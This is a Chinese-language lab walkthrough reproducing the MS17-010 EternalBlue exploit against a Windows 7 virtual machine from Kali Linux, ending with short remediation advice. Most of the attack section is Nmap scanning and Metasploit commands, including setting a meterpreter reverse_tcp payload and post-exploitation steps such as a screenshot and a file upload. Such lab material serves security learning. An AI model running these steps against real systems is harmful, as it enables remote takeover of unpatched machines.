复现MS17-010永恒之蓝
永恒之蓝介绍
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。
漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。
影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。
环境
- 攻击机:Kali-Linux-2021 虚拟机 IP:192.168.134.128
- 靶机:Windows7 虚拟机 IP:192.168.134.121
使用工具
- Nmap 网络扫描工具
- Metasploit 渗透框架,能获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业级漏洞攻击工具
开始复现
- 登录管理员账号
namp -T4 -A -v -Pn 192.168.134.0/24
- 成功发现192.168.134.121
namp -T4 -A -v -Pn 192.168.134.121 //扫描此段ip开放端口
-
发现445端口开放
-
通过命令启动Metasploit
msfconsole
- 搜索ms17-010有关模块
- exploit是攻击模块,auxiliary是辅助模块,这里我们先选用3辅助扫描模块,来确定漏洞是否存在
- 然后查看该模块需要修改的参数
use 3
show options
required中yes选项是必须要填的,可以看到缺少了RHOSTS
- 设置目标
- 查看确认已更改
run //运行扫描模块
use 0 //运行攻击模块
show options //查看参数信息
- 设置攻击载荷,这里默认为windows/x64/meterpreter/reverse_tcp,然后设置目标IP,攻击者IP
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.134.121 //目标机
set lhost 192.168.134.128 //攻击机
run //开始攻击
运行成功可以开始攻击了
getuid //查看目标机权限
screenshot //拍摄一张桌面照
- 拍摄成功并保存到了桌面1
- 尝试把保存下来的照片发送到目标机
upload 本地照片位置 目标位置
- 运行成功打开目标机查看,发现照片
修复方法
-
关闭bios服务,或开启防火墙,屏蔽服务端口
-
给系统打上永恒之蓝的漏洞修复补丁